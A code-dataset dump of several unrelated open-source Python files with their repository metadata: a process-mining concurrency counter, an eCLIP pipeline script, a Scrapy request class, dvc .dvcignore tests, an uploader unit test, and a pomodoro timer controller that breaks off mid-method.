        Parameters of the algorithm, including:
        - Parameters.ACTIVITY_KEY => activity key
        - Parameters.CASE_ID_KEY => case id
        - Parameters.START_TIMESTAMP_KEY => start timestamp
        - Parameters.TIMESTAMP_KEY => complete timestamp
        - Parameters.STRICT => Determine if only entries that are strictly concurrent
        (i.e. the length of the intersection as real interval is > 0) should be obtained. Default: False

    Returns
    --------------
    ret_dict
        Dictionary mapping a couple of activities (tuple) to the number of times
        they have been executed in parallel in the log
    """
    if parameters is None:
        parameters = {}

    # Resolve configuration, falling back to the library defaults.
    act_key = exec_utils.get_param_value(
        Parameters.ACTIVITY_KEY, parameters, xes_constants.DEFAULT_NAME_KEY)
    case_key = exec_utils.get_param_value(
        Parameters.CASE_ID_KEY, parameters, constants.CASE_CONCEPT_NAME)
    ts_key = exec_utils.get_param_value(
        Parameters.TIMESTAMP_KEY, parameters, xes_constants.DEFAULT_TIMESTAMP_KEY)
    start_ts_key = exec_utils.get_param_value(
        Parameters.START_TIMESTAMP_KEY, parameters, None)
    strict = exec_utils.get_param_value(Parameters.STRICT, parameters, False)

    conc_df = get_concurrent_events_dataframe(
        dataframe,
        start_timestamp_key=start_ts_key,
        timestamp_key=ts_key,
        case_id_glue=case_key,
        activity_key=act_key,
        strict=strict,
    )

    counts = conc_df.groupby([act_key, act_key + '_2']).size().to_dict()

    # Collapse (a, b) / (b, a) into one canonical sorted key, converting
    # numpy scalars to plain Python ints.
    return {tuple(sorted(pair)): int(cnt) for pair, cnt in counts.items()}
| 44.654321 | 129 | 0.709151 | 474 | 3,617 | 5.21308 | 0.367089 | 0.072845 | 0.048159 | 0.034399 | 0.22501 | 0.117766 | 0.049777 | 0.035613 | 0 | 0 | 0 | 0.006043 | 0.222284 | 3,617 | 80 | 130 | 45.2125 | 0.872378 | 0.431573 | 0 | 0 | 0 | 0 | 0.004169 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034483 | false | 0 | 0.172414 | 0 | 0.448276 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4151c5c3dbe7d9b634bc3106ccbd1a50caa1fb1f | 1,120 | py | Python | pipeline.py | Overnickel/eclip | 8c52160d4e4418b4b1e186f30b4e06491ada9c40 | [
"MIT"
] | null | null | null | pipeline.py | Overnickel/eclip | 8c52160d4e4418b4b1e186f30b4e06491ada9c40 | [
"MIT"
] | null | null | null | pipeline.py | Overnickel/eclip | 8c52160d4e4418b4b1e186f30b4e06491ada9c40 | [
"MIT"
] | 1 | 2020-03-05T23:58:04.000Z | 2020-03-05T23:58:04.000Z | import os
import argparse
import yaml
import pprint
from easydict import EasyDict as edict
from download import download
from read_process import read_process
from de_analysis import de
from cancer import cancer
def parse_args():
    """Parse the command-line arguments for the eCLIP pipeline.

    Returns:
        argparse.Namespace with a single ``config_file`` attribute.
    """
    parser = argparse.ArgumentParser(description='eCLIP')
    parser.add_argument(
        '--config',
        dest='config_file',
        type=str,
        default='configs.yml',
        help='configuration filename',
    )
    return parser.parse_args()
def load_config(config_path):
    """Load a YAML configuration file into an attribute-accessible dict.

    Args:
        config_path: Path to the YAML configuration file.

    Returns:
        easydict.EasyDict wrapping the parsed configuration.
    """
    with open(config_path, 'r') as f:
        # safe_load avoids arbitrary-object construction on untrusted input
        # and works on PyYAML >= 6, where bare yaml.load() without a Loader
        # raises TypeError.
        config = edict(yaml.safe_load(f))
    return config
def main():
    """Run the full eCLIP pipeline: download, read processing, DE, cancer."""
    print('ECLIP data processing pipeline.')

    # Load and display the configuration.
    args = parse_args()
    if args.config_file is None:
        raise Exception('no configuration file')
    config = load_config(args.config_file)
    pprint.PrettyPrinter(indent=2).pprint(config)

    # Pipeline stages, executed strictly in this order.
    for stage in (download, read_process, de, cancer):
        stage(config)


if __name__ == '__main__':
    main()
| 21.960784 | 57 | 0.677679 | 136 | 1,120 | 5.411765 | 0.441176 | 0.054348 | 0.038043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00116 | 0.230357 | 1,120 | 50 | 58 | 22.4 | 0.852668 | 0.077679 | 0 | 0 | 0 | 0 | 0.11546 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09375 | false | 0 | 0.28125 | 0 | 0.4375 | 0.09375 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41528f11f89e17b45a8aaf9f472409371cd43c86 | 887 | py | Python | finscraper/request.py | jmyrberg/finscraper | f90399a0c33247d3bb896ca987ef6f293609abe0 | [
"MIT"
] | null | null | null | finscraper/request.py | jmyrberg/finscraper | f90399a0c33247d3bb896ca987ef6f293609abe0 | [
"MIT"
] | 24 | 2020-05-09T19:18:30.000Z | 2020-11-21T22:47:39.000Z | finscraper/request.py | jmyrberg/finscraper | f90399a0c33247d3bb896ca987ef6f293609abe0 | [
"MIT"
] | null | null | null | """Module for custom Scrapy request components."""
from scrapy import Request
class SeleniumCallbackRequest(Request):
    """Process request with given callback using Selenium.

    Args:
        selenium_callback (func or None, optional): Function that will be
            called with the chrome webdriver. The function should take in
            parameters (request, spider, driver) and return request, response
            or None. If None, driver will be used for fetching the page, and
            return is response. Defaults to None.
    """

    def __init__(self, *args, selenium_callback=None, **kwargs):
        # A falsy meta (absent, None or {}) is normalized to a fresh dict.
        meta = kwargs.pop('meta', None) or {}
        # Keep an explicitly provided callback; only fill in the default.
        meta.setdefault('selenium_callback', selenium_callback)
        kwargs['meta'] = meta
        super().__init__(*args, **kwargs)
| 36.958333 | 77 | 0.668546 | 105 | 887 | 5.504762 | 0.52381 | 0.138408 | 0.069204 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.24239 | 887 | 23 | 78 | 38.565217 | 0.860119 | 0.491545 | 0 | 0 | 0 | 0 | 0.092457 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41533ac389ddcc893deaa3a3dea233e8a8c4234c | 12,254 | py | Python | tests/func/test_ignore.py | farizrahman4u/dvc | a56c8bbab662c3792ae12aa7db6c40a42a23de50 | [
"Apache-2.0"
] | 1 | 2020-08-12T22:51:45.000Z | 2020-08-12T22:51:45.000Z | tests/func/test_ignore.py | farizrahman4u/dvc | a56c8bbab662c3792ae12aa7db6c40a42a23de50 | [
"Apache-2.0"
] | null | null | null | tests/func/test_ignore.py | farizrahman4u/dvc | a56c8bbab662c3792ae12aa7db6c40a42a23de50 | [
"Apache-2.0"
] | 1 | 2020-11-28T11:47:48.000Z | 2020-11-28T11:47:48.000Z | import os
import shutil
import pytest
from dvc.exceptions import DvcIgnoreInCollectedDirError
from dvc.ignore import (
DvcIgnore,
DvcIgnoreDirs,
DvcIgnorePatterns,
DvcIgnorePatternsTrie,
DvcIgnoreRepo,
)
from dvc.path_info import PathInfo
from dvc.repo import Repo
from dvc.tree.local import LocalRemoteTree
from dvc.utils import relpath
from dvc.utils.fs import get_mtime_and_size
from tests.dir_helpers import TmpDir
def test_ignore(tmp_dir, dvc, monkeypatch):
    """A path listed in .dvcignore is hidden from tree.walk_files."""
    tmp_dir.gen({"dir": {"ignored": "text", "other": "text2"}})
    tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "dir/ignored")
    # Drop the tree's memoized "dvcignore" attribute so the file just
    # written is re-read (same pattern throughout this module).
    dvc.tree.__dict__.pop("dvcignore", None)

    path = PathInfo(tmp_dir)

    assert set(dvc.tree.walk_files(path / "dir")) == {path / "dir" / "other"}
def test_ignore_unicode(tmp_dir, dvc):
    """Non-ASCII file names in .dvcignore patterns are honored."""
    tmp_dir.gen({"dir": {"other": "text", "тест": "проверка"}})
    tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "dir/тест")
    dvc.tree.__dict__.pop("dvcignore", None)

    path = PathInfo(tmp_dir)

    assert set(dvc.tree.walk_files(path / "dir")) == {path / "dir" / "other"}
def test_rename_ignored_file(tmp_dir, dvc):
    """Renaming within the ignored set leaves dir mtime and size unchanged."""
    tmp_dir.gen({"dir": {"ignored": "...", "other": "text"}})
    tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "ignored*")
    dvc.tree.__dict__.pop("dvcignore", None)

    mtime, size = get_mtime_and_size("dir", dvc.tree)
    # "ignored*" matches both the old and the new name.
    shutil.move("dir/ignored", "dir/ignored_new")
    new_mtime, new_size = get_mtime_and_size("dir", dvc.tree)

    assert new_mtime == mtime and new_size == size
def test_rename_file(tmp_dir, dvc):
    """Renaming a non-ignored file changes dir mtime but not its size."""
    tmp_dir.gen({"dir": {"foo": "foo", "bar": "bar"}})

    mtime, size = get_mtime_and_size("dir", dvc.tree)
    shutil.move("dir/foo", "dir/foo_new")
    new_mtime, new_size = get_mtime_and_size("dir", dvc.tree)

    assert new_mtime != mtime and new_size == size
def test_remove_ignored_file(tmp_dir, dvc):
    """Removing an ignored file leaves dir mtime and size unchanged."""
    tmp_dir.gen({"dir": {"ignored": "...", "other": "text"}})
    tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "dir/ignored")
    dvc.tree.__dict__.pop("dvcignore", None)

    mtime, size = get_mtime_and_size("dir", dvc.tree)
    os.remove("dir/ignored")
    new_mtime, new_size = get_mtime_and_size("dir", dvc.tree)

    assert new_mtime == mtime and new_size == size
def test_remove_file(tmp_dir, dvc):
    """Removing a non-ignored file changes both dir mtime and size."""
    tmp_dir.gen({"dir": {"foo": "foo", "bar": "bar"}})

    mtime, size = get_mtime_and_size("dir", dvc.tree)
    os.remove("dir/foo")
    new_mtime, new_size = get_mtime_and_size("dir", dvc.tree)

    assert new_mtime != mtime and new_size != size
def test_dvcignore_in_out_dir(tmp_dir, dvc):
    """`dvc add` rejects a directory that contains a .dvcignore file."""
    tmp_dir.gen({"dir": {"foo": "foo", DvcIgnore.DVCIGNORE_FILE: ""}})

    with pytest.raises(DvcIgnoreInCollectedDirError):
        dvc.add("dir")
@pytest.mark.parametrize("dname", ["dir", "dir/subdir"])
def test_ignore_collecting_dvcignores(tmp_dir, dvc, dname):
    """A .dvcignore inside an ignored directory is itself ignored: only the
    outer ignore file ends up in the pattern trie."""
    tmp_dir.gen({"dir": {"subdir": {}}})

    # Ignore `dname` from its parent directory...
    top_ignore_file = (tmp_dir / dname).with_name(DvcIgnore.DVCIGNORE_FILE)
    top_ignore_file.write_text(os.path.basename(dname))
    dvc.tree.__dict__.pop("dvcignore", None)

    # ...then place another .dvcignore inside the now-ignored directory.
    ignore_file = tmp_dir / dname / DvcIgnore.DVCIGNORE_FILE
    ignore_file.write_text("foo")

    assert len(dvc.tree.dvcignore.ignores) == 3
    assert DvcIgnoreDirs([".git", ".hg", ".dvc"]) in dvc.tree.dvcignore.ignores
    ignore_pattern_trie = None
    for ignore in dvc.tree.dvcignore.ignores:
        if isinstance(ignore, DvcIgnorePatternsTrie):
            ignore_pattern_trie = ignore

    assert ignore_pattern_trie is not None
    # The trie lookup for the inner file resolves to the OUTER ignore file's
    # patterns — the inner one was never collected.
    assert (
        DvcIgnorePatterns.from_files(
            os.fspath(top_ignore_file),
            LocalRemoteTree(None, {"url": dvc.root_dir}),
        )
        == ignore_pattern_trie[os.fspath(ignore_file)]
    )

    assert any(
        i for i in dvc.tree.dvcignore.ignores if isinstance(i, DvcIgnoreRepo)
    )
def test_ignore_on_branch(tmp_dir, scm, dvc):
    """A .dvcignore committed on a branch only applies when that branch's
    tree is used."""
    tmp_dir.scm_gen({"foo": "foo", "bar": "bar"}, commit="add files")

    with tmp_dir.branch("branch", new=True):
        tmp_dir.scm_gen(DvcIgnore.DVCIGNORE_FILE, "foo", commit="add ignore")

    dvc.tree.__dict__.pop("dvcignore", None)
    path = PathInfo(tmp_dir)
    # On the original branch nothing is ignored.
    assert set(dvc.tree.walk_files(path)) == {
        path / "foo",
        path / "bar",
    }

    # Switching to the branch tree makes "foo" disappear.
    dvc.tree = scm.get_tree("branch", use_dvcignore=True)
    assert set(dvc.tree.walk_files(path)) == {
        os.fspath(path / DvcIgnore.DVCIGNORE_FILE),
        os.fspath(path / "bar"),
    }
def test_match_nested(tmp_dir, dvc):
    """Patterns from a top-level .dvcignore match at any nesting depth."""
    tmp_dir.gen(
        {
            ".dvcignore": "*.backup\ntmp",
            "foo": "foo",
            "tmp": "...",
            "dir": {"x.backup": "x backup", "tmp": "content"},
        }
    )
    dvc.tree.__dict__.pop("dvcignore", None)

    result = {os.fspath(os.path.normpath(f)) for f in dvc.tree.walk_files(".")}
    assert result == {".dvcignore", "foo"}
def test_ignore_external(tmp_dir, scm, dvc, tmp_path_factory):
    """The repo's .dvcignore does not apply to paths outside the repo."""
    tmp_dir.gen(".dvcignore", "*.backup\ntmp")
    ext_dir = TmpDir(os.fspath(tmp_path_factory.mktemp("external_dir")))
    ext_dir.gen({"y.backup": "y", "tmp": "ext tmp"})

    # Both files would be ignored inside the repo; externally they are kept.
    result = {relpath(f, ext_dir) for f in dvc.tree.walk_files(ext_dir)}
    assert result == {"y.backup", "tmp"}
def test_ignore_subrepo(tmp_dir, scm, dvc):
tmp_dir.gen({".dvcignore": "foo", "subdir": {"foo": "foo"}})
scm.add([".dvcignore"])
scm.commit("init parent dvcignore")
dvc.tree.__dict__.pop("dvcignore", None)
subrepo_dir = tmp_dir / "subdir"
assert not dvc.tree.exists(PathInfo(subrepo_dir / "foo"))
with subrepo_dir.chdir():
subrepo = Repo.init(subdir=True)
scm.add(str(subrepo_dir / "foo"))
scm.commit("subrepo init")
for _ in subrepo.brancher(all_commits=True):
assert subrepo.tree.exists(PathInfo(subrepo_dir / "foo"))
def test_ignore_blank_line(tmp_dir, dvc):
    """Blank lines in .dvcignore are skipped, not treated as patterns."""
    tmp_dir.gen({"dir": {"ignored": "text", "other": "text2"}})
    tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "foo\n\ndir/ignored")
    dvc.tree.__dict__.pop("dvcignore", None)

    path = PathInfo(tmp_dir)

    assert set(dvc.tree.walk_files(path / "dir")) == {path / "dir" / "other"}
# It is not possible to re-include a file if a parent directory of
# that file is excluded.
# Git doesn’t list excluded directories for performance reasons,
# so any patterns on contained files have no effect,
# no matter where they are defined.
@pytest.mark.parametrize(
    "data_struct, pattern_list, result_set",
    [
        # Only files inside subdir are excluded -> re-inclusion works.
        (
            {"dir": {"subdir": {"not_ignore": "121"}}},
            ["subdir/*", "!not_ignore"],
            {os.path.join("dir", "subdir", "not_ignore")},
        ),
        # The directory itself is excluded -> re-inclusion has no effect.
        (
            {"dir": {"subdir": {"should_ignore": "121"}}},
            ["subdir", "!should_ignore"],
            set(),
        ),
        (
            {"dir": {"subdir": {"should_ignore": "121"}}},
            ["subdir/", "!should_ignore"],
            set(),
        ),
    ],
)
def test_ignore_file_in_parent_path(
    tmp_dir, dvc, data_struct, pattern_list, result_set
):
    """A `!pattern` cannot re-include a file whose parent dir is excluded."""
    tmp_dir.gen(data_struct)
    tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "\n".join(pattern_list))
    dvc.tree.__dict__.pop("dvcignore", None)

    path = PathInfo(tmp_dir)

    assert set(dvc.tree.walk_files(path / "dir")) == {
        path / relpath for relpath in result_set
    }
# If there is a separator at the end of the pattern then the pattern
# will only match directories,
# otherwise the pattern can match both files and directories.
# For example, a pattern doc/frotz/ matches doc/frotz directory,
# but not a/doc/frotz directory;
def test_ignore_sub_directory(tmp_dir, dvc):
    """A pattern containing a separator (``doc/fortz``) matches only relative
    to the .dvcignore's own directory, not nested copies deeper down."""
    tmp_dir.gen(
        {
            "dir": {
                "doc": {"fortz": {"b": "b"}},
                "a": {"doc": {"fortz": {"a": "a"}}},
            }
        }
    )
    tmp_dir.gen({"dir": {DvcIgnore.DVCIGNORE_FILE: "doc/fortz"}})
    dvc.tree.__dict__.pop("dvcignore", None)

    path = PathInfo(tmp_dir)

    # dir/doc/fortz is ignored; dir/a/doc/fortz survives.
    assert set(dvc.tree.walk_files(path / "dir")) == {
        path / "dir" / "a" / "doc" / "fortz" / "a",
        path / "dir" / DvcIgnore.DVCIGNORE_FILE,
    }
# however frotz/ matches frotz and a/frotz that is a directory
def test_ignore_directory(tmp_dir, dvc):
    """A bare-name pattern (no separator) matches directories at any depth."""
    tmp_dir.gen({"dir": {"fortz": {}, "a": {"fortz": {}}}})
    tmp_dir.gen({"dir": {DvcIgnore.DVCIGNORE_FILE: "fortz"}})
    dvc.tree.__dict__.pop("dvcignore", None)

    path = PathInfo(tmp_dir)

    # Both fortz directories are ignored; only the ignore file remains.
    assert set(dvc.tree.walk_files(path / "dir")) == {
        path / "dir" / DvcIgnore.DVCIGNORE_FILE,
    }
def test_multi_ignore_file(tmp_dir, dvc, monkeypatch):
    """A nested .dvcignore can re-include files excluded by an outer one."""
    tmp_dir.gen({"dir": {"subdir": {"should_ignore": "1", "not_ignore": "1"}}})
    # Outer file excludes both; inner file re-includes not_ignore.
    tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "dir/subdir/*_ignore")
    tmp_dir.gen({"dir": {DvcIgnore.DVCIGNORE_FILE: "!subdir/not_ignore"}})
    dvc.tree.__dict__.pop("dvcignore", None)

    path = PathInfo(tmp_dir)

    assert set(dvc.tree.walk_files(path / "dir")) == {
        path / "dir" / "subdir" / "not_ignore",
        path / "dir" / DvcIgnore.DVCIGNORE_FILE,
    }
def test_pattern_trie_tree(tmp_dir, dvc):
    """Patterns accumulate down the trie: each node sees its own rules plus
    its ancestors' rules, rebased onto the ancestor's directory."""
    tmp_dir.gen(
        {
            "top": {
                "first": {
                    DvcIgnore.DVCIGNORE_FILE: "a\nb\nc",
                    "middle": {
                        "second": {
                            DvcIgnore.DVCIGNORE_FILE: "d\ne\nf",
                            "bottom": {},
                        }
                    },
                },
            },
            "other": {DvcIgnore.DVCIGNORE_FILE: "1\n2\n3"},
        }
    )
    dvc.tree.__dict__.pop("dvcignore", None)
    ignore_pattern_trie = None
    for ignore in dvc.tree.dvcignore.ignores:
        if isinstance(ignore, DvcIgnorePatternsTrie):
            ignore_pattern_trie = ignore
            break

    assert ignore_pattern_trie is not None
    ignore_pattern_top = ignore_pattern_trie[os.fspath(tmp_dir / "top")]
    ignore_pattern_other = ignore_pattern_trie[os.fspath(tmp_dir / "other")]
    ignore_pattern_first = ignore_pattern_trie[
        os.fspath(tmp_dir / "top" / "first")
    ]
    ignore_pattern_middle = ignore_pattern_trie[
        os.fspath(tmp_dir / "top" / "first" / "middle")
    ]
    ignore_pattern_second = ignore_pattern_trie[
        os.fspath(tmp_dir / "top" / "first" / "middle" / "second")
    ]
    ignore_pattern_bottom = ignore_pattern_trie[
        os.fspath(tmp_dir / "top" / "first" / "middle" / "second" / "bottom")
    ]

    # "top" has no ignore file: its node holds an empty (falsy) pattern set.
    assert not ignore_pattern_top
    assert (
        DvcIgnorePatterns([], os.fspath(tmp_dir / "top")) == ignore_pattern_top
    )
    assert (
        DvcIgnorePatterns(["1", "2", "3"], os.fspath(tmp_dir / "other"))
        == ignore_pattern_other
    )
    # "first" owns a/b/c; "middle" has no file so it inherits them unchanged.
    assert (
        DvcIgnorePatterns(
            ["a", "b", "c"], os.fspath(tmp_dir / "top" / "first")
        )
        == ignore_pattern_first
    )
    assert (
        DvcIgnorePatterns(
            ["a", "b", "c"], os.fspath(tmp_dir / "top" / "first")
        )
        == ignore_pattern_middle
    )
    # "second" adds d/e/f, rebased to first's dir; "bottom" inherits that.
    assert (
        DvcIgnorePatterns(
            [
                "a",
                "b",
                "c",
                "/middle/second/**/d",
                "/middle/second/**/e",
                "/middle/second/**/f",
            ],
            os.fspath(tmp_dir / "top" / "first"),
        )
        == ignore_pattern_second
    )
    assert (
        DvcIgnorePatterns(
            [
                "a",
                "b",
                "c",
                "/middle/second/**/d",
                "/middle/second/**/e",
                "/middle/second/**/f",
            ],
            os.fspath(tmp_dir / "top" / "first"),
        )
        == ignore_pattern_bottom
    )
def test_ignore_in_added_dir(tmp_dir, dvc):
    """Ignored content inside an added directory is excluded from the cache,
    so checkout does not restore it after removal."""
    tmp_dir.gen(
        {
            "dir": {
                "sub": {
                    "ignored": {"content": "ignored content"},
                    "not_ignored": "not ignored content",
                }
            },
            ".dvcignore": "**/ignored",
        }
    )
    dvc.tree.__dict__.pop("dvcignore", None)

    ignored_path = tmp_dir / "dir" / "sub" / "ignored"
    # Invisible to the dvc tree, but physically present on disk.
    assert not dvc.tree.exists(PathInfo(ignored_path))
    assert ignored_path.exists()

    dvc.add("dir")
    shutil.rmtree(ignored_path)
    dvc.checkout()

    # Checkout does not bring the ignored directory back.
    assert not ignored_path.exists()
| 31.260204 | 79 | 0.5945 | 1,518 | 12,254 | 4.550066 | 0.128459 | 0.065151 | 0.036485 | 0.027798 | 0.582597 | 0.544665 | 0.491386 | 0.397568 | 0.371218 | 0.345012 | 0 | 0.002172 | 0.248572 | 12,254 | 391 | 80 | 31.340153 | 0.747937 | 0.044557 | 0 | 0.350649 | 0 | 0 | 0.133892 | 0 | 0 | 0 | 0 | 0 | 0.107143 | 1 | 0.061688 | false | 0 | 0.035714 | 0 | 0.097403 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4154f5618899e57ee64e540445a53194c1b762ee | 1,479 | py | Python | synthea-hiv/uploader/uploader_test.py | GoogleCloudPlatform/openmrs-fhir-analytics | 839a5c54e0c81d174522dcb9930b26bc49dfa748 | [
"ECL-2.0",
"Apache-2.0"
] | 39 | 2020-08-07T18:10:21.000Z | 2021-12-24T14:08:36.000Z | synthea-hiv/uploader/uploader_test.py | mozzy11/openmrs-fhir-analytics | 796c75f3cc94cfad08e6e4a42d670830e9302d17 | [
"Apache-2.0"
] | 205 | 2020-08-20T05:25:29.000Z | 2022-02-04T19:20:44.000Z | synthea-hiv/uploader/uploader_test.py | mozzy11/openmrs-fhir-analytics | 796c75f3cc94cfad08e6e4a42d670830e9302d17 | [
"Apache-2.0"
] | 32 | 2020-08-13T19:14:50.000Z | 2022-03-25T04:45:39.000Z | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from unittest import mock
import uploader
class UploaderTest(unittest.TestCase):
    """Tests for uploader.Uploader bundle-upload behavior."""

    def setUp(self):
        super().setUp()
        self.mock_client = mock.MagicMock()
        self.mock_bundle = mock.MagicMock()
        # Stub Uploader._upload_resource so every upload returns id '123'.
        self._upload_resource = mock.patch.object(
            uploader.Uploader, '_upload_resource', return_value='123').start()

    def test_upload_bundle(self):
        # An OpenMRS bundle with a patient triggers an upload and records
        # the returned server id on the patient resource.
        self.mock_bundle.openmrs_patient = mock.MagicMock()
        upload_handler = uploader.Uploader(self.mock_client)
        upload_handler.upload_openmrs_bundle(self.mock_bundle)
        self.assertTrue(self._upload_resource.called)
        self.assertEqual(self.mock_bundle.openmrs_patient.base.new_id, '123')

    def test_upload_bundle_gcp(self):
        # A bundle without a patient skips resource upload entirely.
        self.mock_bundle.patient = None
        upload_handler = uploader.Uploader(self.mock_client)
        upload_handler.upload_bundle(self.mock_bundle)
        self.assertFalse(self._upload_resource.called)
| 35.214286 | 74 | 0.76403 | 206 | 1,479 | 5.325243 | 0.480583 | 0.065634 | 0.076572 | 0.02917 | 0.20784 | 0.113036 | 0.113036 | 0.113036 | 0.113036 | 0.113036 | 0 | 0.01112 | 0.148749 | 1,479 | 41 | 75 | 36.073171 | 0.860207 | 0.370521 | 0 | 0.095238 | 0 | 0 | 0.023991 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.142857 | false | 0 | 0.142857 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4155116ee8c8f0032b20650c9fd29fb3f6faf25b | 7,033 | py | Python | stargazing/pomodoro/pomodoro_controller.py | mtu2/stargazing | 8c32728d64e8a7273299ab9d88e814d7a7bb47f2 | [
"MIT"
] | null | null | null | stargazing/pomodoro/pomodoro_controller.py | mtu2/stargazing | 8c32728d64e8a7273299ab9d88e814d7a7bb47f2 | [
"MIT"
] | null | null | null | stargazing/pomodoro/pomodoro_controller.py | mtu2/stargazing | 8c32728d64e8a7273299ab9d88e814d7a7bb47f2 | [
"MIT"
] | null | null | null | from __future__ import annotations
from enum import Enum
from typing import List
import os.path as path
import stargazing.data.database as database
import stargazing.audio.audio_controller as audio_ac
import stargazing.audio.audio_player as audio_ap
import stargazing.pomodoro.timer as pomo_t
import stargazing.project.project_controller as proj_pc
from stargazing.utils.format_funcs import format_pomodoro_time
# Bundled alarm sounds, resolved relative to this module's location.
ALARM_START_PATH = f"{path.dirname(path.abspath(__file__))}/../res/alarm_start.mp3"
ALARM_FINISH_PATH = f"{path.dirname(path.abspath(__file__))}/../res/alarm_finish.mp3"
class PomodoroIntervalSettings():
    """Interval settings for the pomodoro timer.

    @param work_secs: Number of seconds for the work interval of the timer.
    @param break_secs: Number of seconds for the break interval of the timer."""

    def __init__(self, work_secs: int, break_secs: int) -> None:
        self.work_secs = work_secs
        self.break_secs = break_secs

    @property
    def name(self) -> str:
        """Human-readable label built from both interval lengths."""
        return f"{format_pomodoro_time(self.work_secs, False)} + {format_pomodoro_time(self.break_secs, False)}"

    def __eq__(self, o: object) -> bool:
        # Guard against foreign types: the original accessed o.work_secs
        # directly and raised AttributeError when compared to non-settings.
        if not isinstance(o, PomodoroIntervalSettings):
            return NotImplemented
        return self.work_secs == o.work_secs and self.break_secs == o.break_secs

    # Defining __eq__ sets __hash__ to None; restore hashability so
    # settings can live in sets/dict keys, consistent with equality.
    def __hash__(self) -> int:
        return hash((self.work_secs, self.break_secs))

    # NOTE: no custom __ne__ — Python 3 derives it from __eq__, which also
    # handles the NotImplemented case correctly (the old hand-written
    # __ne__ would have returned a wrong result for foreign types).
class PomodoroStatus(Enum):
    """Lifecycle states of the pomodoro timer."""
    INACTIVE = "inactive"
    WORK = "work"
    BREAK = "break"
    PAUSED_WORK = "paused work"
    PAUSED_BREAK = "paused break"
    FINISHED_WORK = "finished work"
    FINISHED_BREAK = "finished break"
class PomodoroController():
"""Pomodoro manager, containing current pomodoro timer, status, autostart option and interval settings.
@param project_controller: Instance of a project controller.
@param audio_controller: Instance of an audio controller."""
def __init__(self, project_controller: proj_pc.ProjectController, audio_controller: audio_ac.AudioController,
interval_time: PomodoroIntervalSettings = None, last_autostart=True) -> None:
self.project_controller = project_controller
self.audio_controller = audio_controller
self.interval_settings = interval_time if interval_time else PomodoroIntervalSettings(
2400, 600)
self.autostart_setting = last_autostart
self.timer = pomo_t.Timer(self.interval_settings.work_secs)
self.status = PomodoroStatus.INACTIVE
def finish_timer(self, disable_sound=False) -> None:
if self.status in (PomodoroStatus.WORK, PomodoroStatus.PAUSED_WORK):
database.insert_pomodoro(
self.project_controller.current, self.timer)
self.timer = pomo_t.Timer(self.interval_settings.break_secs)
if not disable_sound:
self.__play_alarm_sound(ALARM_FINISH_PATH)
if self.autostart_setting:
self.timer.start()
self.status = PomodoroStatus.BREAK
else:
self.status = PomodoroStatus.FINISHED_WORK
elif self.status in (PomodoroStatus.BREAK, PomodoroStatus.PAUSED_BREAK):
self.timer = pomo_t.Timer(self.interval_settings.work_secs)
if self.autostart_setting:
self.timer.start()
self.status = PomodoroStatus.WORK
if not disable_sound:
self.__play_alarm_sound(ALARM_START_PATH)
else:
self.status = PomodoroStatus.FINISHED_BREAK
def reset_timer(self) -> None:
if self.status in (PomodoroStatus.WORK, PomodoroStatus.PAUSED_WORK, PomodoroStatus.FINISHED_WORK):
database.insert_pomodoro(
self.project_controller.current, self.timer)
self.timer = pomo_t.Timer(self.interval_settings.work_secs)
self.timer.start()
self.status = PomodoroStatus.WORK
elif self.status in (PomodoroStatus.BREAK, PomodoroStatus.PAUSED_BREAK, PomodoroStatus.FINISHED_BREAK):
self.timer = pomo_t.Timer(self.interval_settings.break_secs)
self.timer.start()
self.status = PomodoroStatus.BREAK
def update_timer(self) -> None:
time_diff, timer_complete = self.timer.update()
if self.status == PomodoroStatus.WORK:
self.project_controller.add_todays_total_time(time_diff)
self.project_controller.current.add_time(time_diff, True)
if timer_complete:
